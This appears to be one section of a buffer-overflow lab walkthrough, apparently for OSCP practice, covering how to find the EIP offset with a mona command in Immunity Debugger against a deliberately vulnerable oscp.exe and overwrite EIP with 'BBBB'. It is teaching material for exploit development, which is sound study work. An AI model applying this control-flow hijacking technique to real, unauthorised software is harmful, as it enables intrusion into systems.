# 4. Overwrite EIP

### EIP <a href="#eip" id="eip"></a>

We use the offset to overwrite to EIP

Copy the output and place it into the payload variable of the [exploit.py](http://exploit.py) script.

**On Windows, in Immunity Debugger, re-open the oscp.exe** again using the same method as before, and click the red play icon to get it running. You will have to do this prior to each time we run the [exploit.py](http://exploit.py) (which we will run multiple times with incremental modifications).

On Kali, run the modified [**exploit.py**](http://exploit.py) **script: python** [**exploit.py**](http://exploit.py)

The script should crash the oscp.exe server again. This time, in Immunity Debugger, in the command input box at the bottom of the screen, run the following mona command, changing the distance to the same length as the pattern you created:

```
!mona findmsp -distance 600
```

Mona should display a log window with the output of the command. If not, click the "Window" menu and then "Log data" to view it (choose "CPU" to switch back to the standard view).

In this output you should see a line which states:

```
EIP contains normal pattern : ... (offset XXXX)
```

Update your [exploit.py](http://exploit.py) script and set the offset variable to this value (was previously set to 0). Set the payload variable to an empty string again. Set the **retn variable to "BBBB"**.

Restart **oscp.exe** in Immunity and run the modified [exploit.py](http://exploit.py) script again. The EIP register should now be overwritten with the 4 B's (e.g. 42424242).